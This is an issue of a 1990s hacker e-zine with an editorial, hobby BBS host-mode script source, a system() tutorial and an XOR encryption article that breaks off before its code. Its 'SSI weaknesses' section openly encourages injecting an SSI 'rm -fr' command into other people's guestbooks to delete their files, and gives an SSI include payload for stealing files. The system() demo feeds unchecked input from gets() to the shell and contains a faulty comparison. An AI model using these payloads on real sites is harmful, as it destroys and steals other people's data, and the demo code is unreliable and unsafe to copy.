A HAVOC Bell Systems Publication

"To protect and serve"

Happy Athiest Day! (Jan. 5th)

Inside this issue:



ArticleAuthor
What's new this issue
EditorialScud-O
The HellNet[tm] C/Source CodeScud-O
SSI weaknessessScud-O
system()Scud-O
XOR EncryptionPsycho
Hot Boot Crash|\|\cFill
Transatlantic Telephone Cable #8Keystroke
For your reading pleasure
RTFM: The lamer Journal
ROLL CALL & more!
Next Month

Send all mail to: thtj@juno.com
If you want to write an article for THTJ email:FoxMuldet@worldnet.att.net


This months music supplied by: Cake, Beck, Sebado, Blood Hound Gang, Tool, Pink Floyd and WHFS 99.1 !
Good Techno music from: sm:)e communications



What's new in this issue:


Not much, but FINALLY Psycho (the world's biggest lamer!) has written an article! So now, for the first time, all the HBS members that aren't MIA have written for THTJ!


How to contact us:

Check Out Our Web Site:
http://www.geocities.com/SiliconValley/8805/
Scud-O's e-mail : FoxMulder@worldnet.att.net
Psycho's e-mail : psycho@smart.net
|\|\cFill's email : down -- server crashed
Keystroke's email : prenzo@soho.ios.com
our Mag e-mail is : thtj@juno.com
HELLCORE's e-mail : hellcore@juno.com



HBS members now (should) have web pages up on our site. go to:
http://www.geocities.com/SiliconValley/8805/members.html


The HAVOC Technical Journal Site of the MONTH:

theLURK3R's WebSite at: TOP

Editorial:


Well this issue has turned out pretty well. The past month has been pretty good as well. The web site has been MAJORLY updated, we now are adding HBS member pages, we have a links page, and AT&T finally let their users use Netscape 2.02 (except ATT changed it and added a pain in the arse bug! I get all this fucking gibberish and have to reload like crazy! its annoying to see gibberish and the page you we just at... damn AT&T!) Anyway... The 403 Forbidden club is dead. It was a gay name. But in spirit, its not dead. HBS Chat is what we are renaming it, and it is going to be cool. The main chat area will be split up into 3 frames, one for the chat, one for users, one for your input. It's just like how mIRC looks. hopefully we can have it up by the new year. It's time delayed chat, but it will reload faster than other web chats. Psycho is the main man on this project, since he knows a little java (and the fact that he would rather use this power for good and not evil) he is writting it. I know a little java and I might help out a little. So every one, give Psycho a round of applause! We would have used CGI.. but geocities sucks and says no. (but me should be moving to either luthor's site or L0pht soon, and they both allow CGI!) Anyway that is all for now... now I must get on with issue 6...
    ----------------------------------------------
  /       ---/   --/  /   /  |  /------/   /    /
 /---       /-----/------/-----/      /   /    /
/----------/                         /--------/
              -of HAVOC Bell Systems-
FoxMulder@worldnet.att.net


"A Scud - a theater ballistic missile - is one of the hardest targets. They're big stainless steel tanks."
- Michael F. Weisbach, Boeing's airborne laser project manager
Back to the TOP

The HellNet[tm] C/Script Source Code:

by Scud-O


I first started on the HellNet[tm] source code the day I got my new 28.8 modem. The US Robotics one I bought came with Quick Link Message Center. It had a host mode that I started to play with. I first only modified the intro text files, but then I wanted to add more. File descriptions would be nice, so would chat. so I went to the Quick Link directory and opened up HOSTMODE.SRP The first thing I noticed was that the script language looked a lot like C code. Hmmm.. I thought.. after adding a couple of features that mostly just displayed text files I started on the chat. I added a while loop and quess what - it worked! so this IS C code. cool.

So anyway here it is, the HellNet[tm] source code. I havent worked on it in about 3-4 months so it is kind of weak. I am now more interested in starting an ISP or other internet stuff.( hell.net sound kind of cool don't you think so? )

Why is it called HellNet[tm]?

Because I felt like it. AT&T has Worldnet, and since HBS is the opposite of AT&T, we had so call it HellNet. The [tm] comes in because Worldnet is a SM (slogan mark) and HellNet[tm] looked cool.

Text files you need to create:


FILEDescription
ABOUT.TXTAbout your BBS
BYE.TXTLog off screen
CALLERS.TXTLEAVE EMPTY!caller info bbs will add
FILEZ.TXTFile Descriptions
HOSTHELP.TXTHELP - you can leave blank, or fill in
HOSTMODE.TXTThe main menu
MSG.TXTBulletins
WAREZ.TXTthe Warezhouse: buy/sell/trade area maybe?


HOSTMODE.SRP


int STACKSIZE = 45;

/* HAVOC Bell Systems HellNet[tm] Host Mode Script Version 0 */
/* Copyright HAVOC Bell Systems (c) 1996 ALL FIGHT F**KED! */

int  BaudRate;

char FALSE = 0;
char TRUE = 1;
char CANCEL = -1;

int  MAX_FILE_LEN = 144;
int  HOST_TIMOUT;

char DefaultProtocol;
char CurrentDir[144];
char StartupDir[144];
char TempDir[144];
char UserName[82];
char userString[82];

char host_timeout = FALSE;
char host_continue;
char security_level;
char last_prompt;
char ASCIITransComplete[] = "\r\nASCII transfer completed.\r\n";
char ASCIITransCanceled[] = "\r\nASCII transfer completed.\r\n";
char xTransComplete[] = "\r\nXmodem transfer completed.\r\n";
char xTransCanceled[] = "\r\nXmodem transfer canceled.\r\n";
char yTransComplete[] = "\r\nYmodem transfer completed.\r\n";
char yTransCanceled[] = "\r\nYmodem transfer canceled.\r\n";
char kTransComplete[] = "\r\nKermit transfer completed.\r\n";
char kTransCanceled[] = "\r\nKermit transfer canceled.\r\n";
char zTransComplete[] = "\r\nZmodem transfer completed.\r\n";
char zTransCanceled[] = "\r\nZmodem transfer canceled.\r\n";
char xyCancelPrompt[] = "\r\nPress Ctrl-X several times to cancel.\r\n";
char thatSelection[] = "\r\nThe option you selected is not available to you.\r\n";
char accessDenied[] = "\r\nAccess denied.\r\n";
char tooLong[] = "\r\n\r\nYou took too long to respond.\r\n\r\nGoodbye!\r\n";
char invalid[] = "\r\nInvalid selection.\r\n";
char pleaseWaitProcessing[] = "\r\nPlease wait.  Your request is being processed...\r\n";

char *days[] = {"Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"};

HostOut(char *str)
{
	Out(str);
	Echo(str);
}


ListProtocols()
{
	HostOut("\r\nChoose a file transfer protocol...\r\n");
        HostOut("[1] ASCII        [5] Ymodem\r\n");
        HostOut("[2] Xmodem       [6] Ymodem-G\r\n");
        HostOut("[3] Xmodem CRC   [7] Kermit/SuperKermit\r\n");
        HostOut("[4] Xmodem 1K    [8] Zmodem\r\n");
        HostOut("                 [ESC] cancels transfer\r\n");
}


SelectProtocol()
{
	int rv;

	ListProtocols();
	DefaultProtocol = 0;
	PrintHostPrompt(3);

    rv = GetUserInput(userString, TRUE, HOST_TIMOUT);
	if (rv)
	{
		if ((userString[0] >= 49) && (userString[0] <= 56) && (!userString[1]))
			DefaultProtocol = userString[0] - 48;
		else
			rv = CANCEL;
	}
    else
		host_timeout = TRUE;
	return(rv);
}


GetFileName()
{
	int rv;

	PrintHostPrompt(4);
    rv = GetUserInput(userString, TRUE, HOST_TIMOUT);

	if (rv == CANCEL)
	{
		return(CANCEL);
	}
	else if (rv == TRUE)
	{
		if (userString[0])
		{
			if ((Exists(userString)) == -1)
			{
				return(-2);
			}
			else
			{
				return(TRUE);
			}
		}
	}
	else
		host_timeout = TRUE;
	return(FALSE);
}


PutFileName()
{
	int rv;

	PrintHostPrompt(4);
    rv = GetUserInput(userString, TRUE, HOST_TIMOUT);

	if (rv == CANCEL)
	{
		return(CANCEL);
	}
	else if (rv == TRUE)
	{
		if (userString[0])
		{
			if ((Exists(userString)) == -1)
			{
				return(TRUE);
			}
			else
			{
				return(FALSE);
			}
		}
	}
	else
		host_timeout = TRUE;
	return(FALSE);
}


GetMultipleFiles(char *fileName)
{
	char ret = TRUE;

	if (fileName[0])
		AddFile(fileName);

	HostOut("\r\nSpecify multiple files, blank filename terminates list.\r\n");

	while ((ret == TRUE) && !host_timeout)
	{
		while ((ret = GetFileName()) == -2)
			HostOut("\r\nFile does not exist.\r\n");

		StrCpy(userString, fileName);
		if (fileName[0])
			AddFile(fileName);
	}
}


DownloadFiles()
{
	int rv;
	char fileName[MAX_FILE_LEN];

    ClearList();
	HostOut("\r\nFile Download");
	if ((GetFileName() == TRUE) && !host_timeout)
	{
	    StrCpy(userString, fileName);
		rv = SelectProtocol();
		if (rv == CANCEL)
			return(CANCEL);
		else if (rv == FALSE)
		return(host_timeout);

		if (DefaultProtocol == 1)
		{
			PrintHostPrompt(5);
			if (GetUserInput(userString, TRUE, HOST_TIMOUT))
			{
				if (Upload(1, fileName))
					HostOut(ASCIITransComplete);
				else
					HostOut(ASCIITransCanceled);
			}
			else
			{
				host_timeout = TRUE;
			}
		}
		else if ((DefaultProtocol == 2) || (DefaultProtocol == 3))
		{
			HostOut("\r\nBegin your Xmodem receive now.");
			HostOut(xyCancelPrompt);
			Wait(2);
			if (Upload(3, fileName))
				HostOut(xTransComplete);
			else
				HostOut(xTransCanceled);
		}
		else if (DefaultProtocol == 4)
		{
			HostOut("\r\nBegin your Xmodem 1K receive now.");
			HostOut(xyCancelPrompt);
			if (Upload(4, fileName))
				HostOut(xTransComplete);
			else
				HostOut(xTransCanceled);
		}
		else if ((DefaultProtocol == 5) || (DefaultProtocol == 6))
		{

                        GetMultipleFiles(fileName);
	    if (!host_timeout)
			{
				if (DefaultProtocol == 5)
					HostOut("\r\nBegin your Ymodem receive now.");
				else
				    HostOut("\r\nBegin your Ymodem-G receive now.");
				HostOut(xyCancelPrompt);
				Wait(2);
				if (Upload(5))
					HostOut(yTransComplete);
				else
					HostOut(yTransCanceled);

			}
		}
		else if (DefaultProtocol == 7)
		{
			GetMultipleFiles(fileName);
	    if (!host_timeout)
			{
				HostOut("\r\nBegin your Kermit/SuperKermit receive now.");
				HostOut(xyCancelPrompt);
				if (Upload(2))
					HostOut(kTransComplete);
				else
					HostOut(kTransCanceled);
			}
		}
		else if (DefaultProtocol == 8)
		{
			GetMultipleFiles(fileName);
	    if (!host_timeout)
			{
				HostOut("\r\nBegin your Zmodem receive now.");
				HostOut(xyCancelPrompt);
				if (Upload(7))
					HostOut(zTransComplete);
				else
					HostOut(zTransCanceled);
			}
		}
	}
	else
		HostOut("\r\nFile does not exist.\r\n");
}


ListFiles()
{
	PrintHostPrompt(6);
	if (GetUserInput(userString, TRUE, HOST_TIMOUT))
	{
		if (userString[1] == ':')
		{
			HostOut("\r\nCannot list files across drives.\r\n");
			return;
		}
		if (!userString[0])
			StrCpy("*.*", userString);
		DisplayFiles(userString, security_level);
	}
	else
		host_timeout = TRUE;
}


UploadFiles()
{
	int file, i = 0, lines = 0, rv;
	char ch, buffer[80];

	Sprintf(buffer, "\r\nThere are %i000 bytes of available disk space on drive %c:\r\n", KBytesFree(CurrentDir[0]), CurrentDir[0]);
	HostOut(buffer);

	rv = SelectProtocol();
	if (rv == CANCEL)
		return(CANCEL);
	else if (rv == FALSE)
	return(host_timeout);

	if (DefaultProtocol == 1)
	{
		if (PutFileName() == TRUE)
		{
			HostOut("\r\nStart your ASCII send now.\r\nPress Ctrl-Z when complete.\r\n");
			rv = Download(1, userString);
			if (rv)
				HostOut(ASCIITransComplete);
			else
				HostOut(ASCIITransCanceled);
		}
		else
		{
			HostOut("\r\nFile already exists.\r\n");
			return(CANCEL);
		}
	}
    else if (DefaultProtocol == 2)
	{
		if (PutFileName() == TRUE)
		{
			HostOut("\r\nStart your Xmodem send now.");
			HostOut(xyCancelPrompt);
			Wait(2);
			rv = Download(3, userString);
			if (rv)
				HostOut(xTransComplete);
			else
				HostOut(xTransCanceled);
		}
		else
		{
			HostOut("\r\nFile already exists.\r\n");
			return(CANCEL);
		}
	}
    else if (DefaultProtocol == 3)
	{
		if (PutFileName() == TRUE)
		{
			HostOut("\r\nStart your Xmodem CRC send now.");
			HostOut(xyCancelPrompt);
			Wait(2);
			rv = Download(4, userString);
			if (rv)
				HostOut(xTransComplete);
			else
				HostOut(xTransCanceled);
		}
		else
		{
			HostOut("\r\nFile already exists.\r\n");
			return(CANCEL);
		}
	}
    else if (DefaultProtocol == 4)
	{
		if (PutFileName() == TRUE)
		{
			HostOut("\r\nStart your Xmodem 1K send now.");
			HostOut(xyCancelPrompt);
			Wait(2);
			rv = Download(5, userString);
			if (rv)
				HostOut(xTransComplete);
			else
				HostOut(xTransCanceled);
		}
		else
		{
			HostOut("\r\nFile already exists.\r\n");
			return(CANCEL);
		}
	}
    else if (DefaultProtocol == 5)
	{
		HostOut("\r\nStart your Ymodem send now.");
		HostOut(xyCancelPrompt);
		Wait(2);
		rv = Download(6);
		if (rv)
			HostOut(yTransComplete);
		else
			HostOut(yTransCanceled);
	}
    else if (DefaultProtocol == 6)
	{
		HostOut("\r\nStart your Ymodem-G send now.");
		HostOut(xyCancelPrompt);
		Wait(2);
		rv = Download(7);
		if (rv)
			HostOut(yTransComplete);
		else
			HostOut(yTransCanceled);
	}
    else if (DefaultProtocol == 7)
	{
		HostOut("\r\nStart your Kermit/SuperKermit send now.\r\n");
		rv = Download(2);
		if (rv)
			HostOut(kTransComplete);
		else
			HostOut(kTransCanceled);

	}
    else if (DefaultProtocol == 8)
	{
		HostOut("\r\nStart your Zmodem send now.\r\n");
		rv = Download(8);
	}
	return(rv);
}


ChangeDirectory()
{
	char directory[85], oldDir[85];
	int i = 0, j, file;

	HostOut("\r\nCurrent path is: ");
	Echo(CurrentDir);
	OutBuffer(CurrentDir, StrLen(CurrentDir));

	HostOut("\r\n Change path to: ");
	if (GetUserInput(userString, TRUE, HOST_TIMOUT))
	{
		if (userString[0])
		{
			if (SetDirectory(userString))
				StrCpy(GetDirectory(), CurrentDir);
			else
		HostOut("\r\nCannot change to specified path.\r\n");
		}
		return(TRUE);
	}
	else
	{
		host_timeout = TRUE;
		return(FALSE);
	}
}


ChangeDrive()
{
	int i = 0, j, file;
	char junk[3];

	HostOut("\r\nCurrent drive is: ");

	Copy(CurrentDir, junk, 2);
	junk[2] = 0;
	HostOut(junk);

	HostOut("\r\n Change drive to: ");

	if (GetUserInput(userString, TRUE, HOST_TIMOUT))
	{
		if (userString[0])
		{
			if (SetDrive(userString))
				StrCpy(GetDirectory(), CurrentDir);
			else
		HostOut("\r\nCannot change to specified drive.\r\n");
		}
		return(TRUE);
	}
	else
	{
		host_timeout = TRUE;
		return(FALSE);
	}
}


PrintHostPrompt(int prompt)
{
	if (prompt)
	last_prompt = prompt;
	if (last_prompt == 1)
	{
                HostOut("\r\n[A]bout [B]illboards [C]hange Drive [D]ownload [E]arlier Callers [F]ilez [G]oodbye [H]elp [L]ist [M]ove [R]elist [T]alk [U]pload [W]arezhouse\r\n");
                HostOut("Enter selection [A,B,C,D,E,F,G,H,L,M,R,T,U,W]: ");
	}
	else if (last_prompt == 2)
		HostOut("\r\nEnter Password: ");
	else if (last_prompt == 3)
                HostOut("\r\nEnter Selection 1-8 or [ESC] to cancel: ");
	else if (last_prompt ==  4)
		HostOut("\r\nFilename: ");
	else if (last_prompt ==  5)
                HostOut("\r\nPress return to begin ASCII receive, [ESC] to cancel:\r\n");
	else if (last_prompt ==  6)
                HostOut("\r\nEnter file search parameter (e.g. *.*).  [ENTER] to search for all.\r\n->");
	else if (last_prompt ==  7)
		HostOut("\r\nEnter Name: ");
	else if (last_prompt ==  8)
                HostOut("\r\nAre you sure? [Y/N]: ");
	else if (last_prompt ==  9)
		HostOut("\r\nEnter Sysop Password: ");
}


LogCall(char *UserName)
{
	int hFile;
	char szLogLine[80];
	
	int year, month, day, dayofweek, hour, minute, second, hsecond;

	Time(&year, &month, &day, &dayofweek, &hour, &minute, &second, &hsecond);
	StrCpy(HomePath(), TempDir);
	StrCat(TempDir, "CALLERS.TXT");
	hFile = Open(TempDir, 1);
	Seek(hFile, 0, 2);
	Sprintf(szLogLine, "%-25s %s %i:%i\r\n", UserName, days[dayofweek], hour, minute);
	Write(hFile, szLogLine, StrLen(szLogLine));
	Close(hFile);
}


HostMainLoop()
{
	char host_online = TRUE, rightpassword = FALSE;

	int start_time, i;
    int year, month, day, dayofweek, hour, minute, second, hsecond;

    start_time = Time(&year, &month, &day, &dayofweek, &hour, &minute, &second, &hsecond);
	while ((CarrierDetect()) && (host_online))
	{
		PrintHostPrompt(1);
		if ((i = GetUserInput(userString, TRUE, HOST_TIMOUT)) == TRUE)
		{
			if ((userString[0] == 'd') || (userString[0] == 'D'))
			{
				if (AllowDownloads())
					DownloadFiles();
				else
					HostOut(thatSelection);
			}
			else if ((userString[0] == 'g') || (userString[0] == 'G'))
			{
				PrintHostPrompt(8);
		    if (GetUserInput(userString, TRUE, HOST_TIMOUT))
				{
					if ((userString[0] == 'y') || (userString[0] == 'Y'))
					{
                                                StrCpy(HomePath(), TempDir);
                                                StrCat(TempDir, "BYE.TXT");
                                                if (!OutFile(TempDir))
                                                HostOut("\r\nGoodbye lamer!\r\n");
			    host_online = FALSE;
					}
				}
				else
					host_timeout = TRUE;
			}
			else if ((userString[0] == 'h') || (userString[0] == 'H') || (userString[0] == '?'))
			{
				StrCpy(HomePath(), TempDir);
				StrCat(TempDir, "HOSTHELP.TXT");
				if (!OutFile(TempDir))
					HostOut("\r\nNo help available.\r\n");
			}
			else if ((userString[0] == 'l') || (userString[0] == 'L'))
			{
				ListFiles();
			}
			else if ((userString[0] == 'u') || (userString[0] == 'U'))
			{
				if (AllowUploads())
					UploadFiles();
				else
					HostOut(thatSelection);
			}
			else if ((userString[0] == 'm') || (userString[0] == 'M'))
			{
				if (security_level > 1)
					ChangeDirectory();
				else
					HostOut(thatSelection);
			}
			else if ((userString[0] == 'c') || (userString[0] == 'C'))
			{
				if (security_level > 1)
					ChangeDrive();
				else
					HostOut(thatSelection);
			}
                        /* Added by HAVOC 7/30/96 */
                        /* Billboard program  i.e messages + mail! */
                        else if ((userString[0] == 'b') || (userString[0] == 'B'))
			{
				StrCpy(HomePath(), TempDir);
                                StrCat(TempDir, "MSG.TXT");
				if (!OutFile(TempDir))
                                        HostOut("\r\nNo MSG available.\r\n");
                                
			}
                        /* Added by HAVOC 7/30/96 */
                        /* chat between op + usr */
                        /* continued work on it 9/14/96 */
                        else if ((userString[0] == 't') || (userString[0] == 'T'))
                        {
                                HostOut("\r\nNOTE: press the tilde key '~' to exit chat!\r\n");
                                for(;;)
                                /* while(userString[0]!= '~') */
                                {
                                        userString[0]=GetUserInput();
                                        if userString[0] == '~'
                                        {
                                                break;
                                        }
                                        else
                                        {
                                                continue;
                                        }

                                }
                        }
                        /* Added by HAVOC 8/4/96 */
                        else if ((userString[0] == 'a') || (userString[0] == 'A'))
                        {
				StrCpy(HomePath(), TempDir);
                                StrCat(TempDir, "ABOUT.TXT");
				if (!OutFile(TempDir))
                                        HostOut("\r\nABOUT is not available now.\r\n");
                        }
                        /* Added by HAVOC 8/4/96 */
                        else if ((userString[0] == 'r') || (userString[0] == 'R'))
                        {
				StrCpy(HomePath(), TempDir);
                                StrCat(TempDir, "HOSTMODE.TXT");
				if (!OutFile(TempDir))
                                        HostOut("\r\nError! Menu is not available now.\r\n");
                        }
                        /* Added by HAVOC 8/13/96 */
                        else if ((userString[0] == 'f') || (userString[0] == 'F'))
                        {
				StrCpy(HomePath(), TempDir);
                                StrCat(TempDir, "FILEZ.TXT");
				if (!OutFile(TempDir))
                                        HostOut("\r\nError! Filez are offline!\r\n");
                        }
                        /* Added by HAVOC 8/13/96 */
                        else if ((userString[0] == 'w') || (userString[0] == 'W'))
                        {
				StrCpy(HomePath(), TempDir);
                                StrCat(TempDir, "WAREZ.TXT");
				if (!OutFile(TempDir))
                                        HostOut("\r\nError! Da Warezhouse is empty!\r\n");
                        }
                        /* Added by HAVOC 9/14/96 */
                        else if ((userString[0] == 'e') || (userString[0] == 'E'))
                        {
                                StrCpy(HomePath(), TempDir);
                                StrCat(TempDir, "CALLERS.TXT");
                                if (!OutFile(TempDir))
                                        HostOut("\r\nHey, we just cleaned the caller file, your caller no. 1 !\r\n");
                        }
			else
				HostOut(invalid);
                }
		else if (i == 0)
			host_timeout = TRUE;

		if (host_timeout)
		{
			HostOut(tooLong);
			break;
		}
	}
}


main()
{
	char ch, connect;
	int i;
	int nKey, FaxMgr;

	host_continue = TRUE;
	connect = FALSE;
    HOST_TIMOUT = (HostTimeout()*60);

	FaxMgr = CalledFromFaxMgr();
	if (!FaxMgr)
	{
		if (CarrierDetect())
		{
                        Echo("\r\nWould you like to hangup the line? [Y/N]: ");
			if (!GetUserInput(userString, TRUE, HOST_TIMOUT))
			{
		    HostOut(tooLong);
				return();
			}
			if ((userString[0] == 'Y') || (userString[0] == 'y'))
			{
				Wait(2);
				Hangup();
			}
			else if ((userString[0] == 'N') || (userString[0] == 'n'))
			{
				connect = TRUE;
			}
		}
	
		if (!connect)
		{
			if (HostSpeed())
				Baud(HostSpeed());
			Parity('N');
			Stop("1");
			Data(8);
			Out(HostInit());
			Out("\r");
		    WaitFor("OK\r\n", 3); 
		}
	}
	StrCpy(GetDirectory(), StartupDir);

	while (host_continue)
	{               
		SetDrive(HostPath());
		SetDirectory(HostPath());
		StrCpy(GetDirectory(), CurrentDir);

		if (!FaxMgr)
		{
			if (!connect)
			{
				Echo("\r\nWaiting for call...\r\n");
                                Echo("HAVOC Bell Systems HellNet[tm] v.0\r\n");
                                Echo("Press [ESC] to cancel or 'L' to logon locally: ");
			}
		}
		else
			FaxMgr = FALSE;

		while ((!connect) && (host_continue))
		{
			nKey = GetKeyStroke();
			if (nKey == -1)
			{
				Echo("\r\nHost mode canceled by operator\r\n");
				host_continue = FALSE;
				break;
			}
			if ((nKey == 'l') || (nKey == 'L'))
			{
				connect = TRUE;
				SetLocalHost(TRUE);
				Echo("\r\nEntering host mode locally.\r\n");
			}
	    	BaudRate = CallDetected();
			if (BaudRate == -1)
			{
				Echo("\r\nWaiting for call...\r\n");
                                Echo("HAVOC Bell Systems HellNet[tm] V.0\r\n");
                                Echo("Press [ESC] to cancel or 'L' to logon locally: ");
			}
			else if (BaudRate)
			{
				Beep();
				LogonDelay();
				connect = TRUE;
			}
		}
		if (host_continue && connect)
		{
			PrintHostPrompt(7);
			if (!GetUserInput(UserName, TRUE, HOST_TIMOUT))
			{
				HostOut(tooLong);
				connect = FALSE;
			}
			else
			{
				LogCall(UserName);
			}
		}
	    if (host_continue && UsePassword() && connect)
		{
			security_level = 0;
			HostOut("\r\n");
			for (i = 0; i < 4; i++)
			{
				PrintHostPrompt(2);
				if (GetUserInput(userString, FALSE, HOST_TIMOUT))
				{
					if (UseMovePassword())
					{
						if (!StrnCmpI(userString, Password(), StrLen(Password())))
						{
							security_level = 2;
							break;
						}
					}
					else
					{
						if (!StrnCmpI(userString, Password(), StrLen(Password())))
						{
							security_level = 1;
							break;
						}
					}
				}
				else
				{
				    HostOut(tooLong);
					connect = FALSE;
					break;
				}
				HostOut("\r\nInvalid password, please try again.\r\n");
			}
		}
		else    
		{                          
			if (UseMovePassword())
				security_level = 2;
			else
				security_level = 1;
        }                         
        
		if (host_continue && connect)
		{
			if (security_level)
			{
				StrCpy(HomePath(), TempDir);
				StrCat(TempDir, "HOSTMODE.TXT");
				OutFile(TempDir);
				userString[0] = 0;
			    HostMainLoop();
			}
			else
				HostOut(accessDenied);
		}
		SetLocalHost(FALSE);
		if (CarrierDetect())
		{
			Wait(2);
			Hangup();
		}
	connect = FALSE;
	host_timeout = FALSE;
	}           
	SetDrive(StartupDir);
	SetDirectory(StartupDir);
}
END OF HOSTMODE.SRP -------------------

Now all I need to do is create all the COMM port source, the download protocals and the HostOut and other stuff.. and then it will be a stand alone BBS.. anyone want to help me out?

NOTE: if you don't have QuickLink e-mail me.. I might send it to you, but i'll tell you where to get it, since we should be getting an FTP site up in a little bit...

The full program is only about 2 megs uncompressed... it is probably only like 800k or so compressed.
Back to the TOP

SSI weaknesses by Scud-O



Server Side Includes (SSI) is a powerful feature of Web servers to use only when a document has only a little bit of dynamic data. Using a counter on a page that otherwise doesn't change is an example. However as great as SSI sounds, it also has some serious security weaknesses. Since SSI can be used to execute programs, poorly designed pages can give out tons of info. However not every server can use SSI, and many turn off the feature. The two most popular servers, NCSA and Netscape can use SSI, but the CERN server can not. However their is a CGI out called fakessi.pl that you can use to emulate SSI with. You can find fakessi.pl at:
sw.cse.bris.ac.uk/WebTools/fakessi.html .

With SSI the main security weaknessed lie in executing CGI's or other programs. You can execute other (insecure) CGI's (like the one in Issue 4) by doing this:

<!--#exec cgi="/cgi-bin/finger.pl"--> Very easy! just change the text between the quotes to run whatever you want.

To execute programs:

<!--#exec cmd="/usr/ucb/finger $REMOTE_USER@$REMOTE_HOST"-->
Both of these would return the results of a finger.

A little bit o fun:

try this:
<!--#exec cmd="/bin/rm -fr"-->
and watch those files just disappear!

Okay you are saying.. well I can do this on MY page, but what about OTHER people's pages?

Well, one example is the standard guestbooks around. Most of them either allow you to enter HTML commands, or they are stupid and process your comments into HTML. If that server has SSI and you use the code above, their files will be deleted! Some guestbooks strip off SSI, but many do not. I am not sure about Lpage, but I suspect that it will not work. However in many guestbook CGI's people write, they will work. Hopefully the web page owner will not see the guestbook and be culeless to why his files are missing! Then if he doesn't update his guestbook, every time some one views it, HIS FILES WILL BE DELETED AGAIN!! Oh well, have fun!

Another attack?


Say there is a REALLY juicy file some one has on their box that you want. Another feature of SSI was ment to include files in an HTML document can help you. Made to add boilerplates (information you want to repeat in many of you web documents) you can use the tag:
<!--#include file="bottom.html"-->
This would include the file bottom with what ever is in the file in the web page. (This is great for uniformity, and I indend to use it as soon as I move to luthor's place or L0pht and have CGI access!)

Anyway, if in the guestbook for example, you type in:
<!--#include file="system1.sniff"--> (say this file has some good sniffer info or something..)

You should, theoretically have the file outputed to the guest book, and from thies either cut and paste or save the html file and you have the file!
Back to the TOP

system() -



while trying to find a C function so that I can use DOS commands on my school's network I found system(). At first I thought it was a non-ANSI function, but to my surprise, once I looked in a few books and saw that it was included in the stdlib.h header so "hey, great!" . system() is VERY simple to use, but you must be careful with memory. Since the system() runs from the program and the program is run from the OS, it doesn't have free run of the memory. Or at least in DOS, UNIX might be different but I haven't been able to test that yet. So basically if you have enough free RAM, the OS command processor will load, otherwise you will get a nasty error message.

the basic format is:
system(command);

for example in DOS to print out the directory listing you can use either:
system("dir");
-OR-
char *command = "dir";
system(command);

Here is an example of system() :

/* system() demonstration by Scud-O of HBS */
/* For The HAVOC Technical Journal Issue 6 */

#include 
#include 

main()
{
	char input[40]; /* a buffer for input */
	
	while(1)
	{
		/* First get the command */
		puts("\nInput your command or hit ENTER to exit");
		gets(input);
		
		/* exit if line is blank */
		if (input[0] == "\0")
			exit(0);
		
		/* otherwise execute command */
		system(input);
	}
}
Now isn't that simple?

If you want to run multiple command, well just use the code above, or do a simple system("command.com") if you are using DOS.

Please note: if you are working on a program that is to be multiplatform, don't use system() or if you do, be careful. If you use ANY special OS commands you will have code that is much less portable.

Well, that's all folks!
Back to the TOP

XOR data encryption with an infinite length key by Psycho



With the increased awareness of the necessity for privacy of electronic information, there is a need for simple, efficient methods of data encryption. One of the most common methods, for some time now, has been the use of the exclusive-OR (XOR) operator on files, with some small repeating bytestream known as the key.


When the resultant file is XORed with the key again, it reverts back to its original state. There are many existing examples of programs that use the XOR method to encrypt files with a key word or phrase. For many, this level of security is more than ample; however, when the length of the encryption key is less than that of the file to be encrypted, there exists the possibility that the repeated key can be deduced, and the file decrypted.


Because the key is repeated many times throughout the encryption process, it may be possible to crack the code within a reasonable amount of time, and thus XOR encryption with small keys is not used in high security situations. However, if the key length is sufficiently great, to the point where it is the equal of the data being encrypted, then XOR encryption remains uncrackable, and is thus an easily implemented encryption method.


The only problem with using keys as large as the file or datastream you need to encrypt is that both the key must be transferred through a secure medium, which might be either costly or unworkable. If you want to encrypt a four hundred megabyte database, you'll need to carry around a decoder CD-ROM with an equally large key! Obtaining a reliable key of such a size, which cannot be determined by other sources, may prove difficult, and is certainly not efficient. If you deal with large files, then finding and transmitting an extremely long key may be costly and time-consuming (particularly if the key is changed regularly for security purposes).


There is, however, a solution! Anyone who has ever generated random numbers upon a computer, quickly realises that the numbers are not truly random. They must be "seeded" with particular values, which give a particular sequence of numbers. We can use this inherent deficiency within random number generators to construct (on-the-fly) an infinitely large key for the purposes of encryption, by seeding it with a particular number which users can specify. Rather than storing the key, we only need pass on the seed value, rather than a huge code-key. Provided the same random number generator is used (usually programming language specific and platform specific) we can have an infinitely large key that gives us increased protection.


Security Warning :

While this method gives greater security that a small, self-repeating XOR encryption key, it does not guarantee absolute protection. The method used to generate a key exploits a weakness in the random number generators of computing languages - namely that they are pseudo-random number generators. Since they are not truely random (and require a seed), we can replicate the same sequence of numbers time and time again. The problem with a pseudo-random number generator is that there may be some underlying pattern to the numbers it generates. Unless your random number generator avoids repetition, there exists the potential for repetition on extremely large files.


General Theory

For those who are unfamiliar with the XOR operator, it is covered in most discrete maths / computer science textbook. For the purposes of encryption, it has several desirable properties. Firstly, its extremely simple to use and understand (unlike more advanced methods such as say, the RSA encryption algorithm used in public key cryptography). We have a series of characters known as a "key" which we use to encrypt a file or datastream. Then, we can at a later date use the same key, and the same programming code, with the XOR operator on the encrypted datastream. Our original data is restored, simply by using the XOR function with the key again.

The syntax for XOR encryption, under most programming languages, is like this :

encrypted_byte = originalbyte XOR keyvalue
(where keyvalue is a byte taken from a repeating sequence of characters which are used both to encrypt and decrypt)

Likewise, the syntax for XOR decryption, under most programming languages, is like this :

original_byte = encrypted_byte XOR keyvalue
(where keyvalue is a byte taken from a repeating sequence of characters which are used both to encrypt and decrypt)

For those interested in the more theoretical details, the exclusive-OR operator is evaluated by examining individual bits, and comparing them to the result in the following truth table.


A B eXculsive-OR
0 0
0
0 1
1
1 0
1
1 1
0


As you can see, the XOR operator will return true if, and only if, the operands are either true, or false, but not both. If A and B are false, then XOR returns false, but if they are different, XOR returns true.


Now, to examine and understand why XOR encryption is so simple to use, take any value for A (either 0 or 1) and apply the XOR function to a key-bit (B) of 0. Do so again, and you will see that you arrive at your original bit (A). Likewise with a key value of 0, a second XOR restores the original bit. This is a handy feature, as your program need not have separate encryption and decryption routines. Simply executing the central algorithm once, then again can both encrypt and decrypt.


Infinite length keys




Our infinite length keys are generated simply through a random number generator which is seeded by a user-specified value. Under most languages, the number generated from one execution of an application will be the same when the application is next executed, unless the generator is seeded; usually by the system timer. But if we seed the generator with a known value - which will generate our encryption key - at a later date that same key can be reproduced for decryption.


Example source code

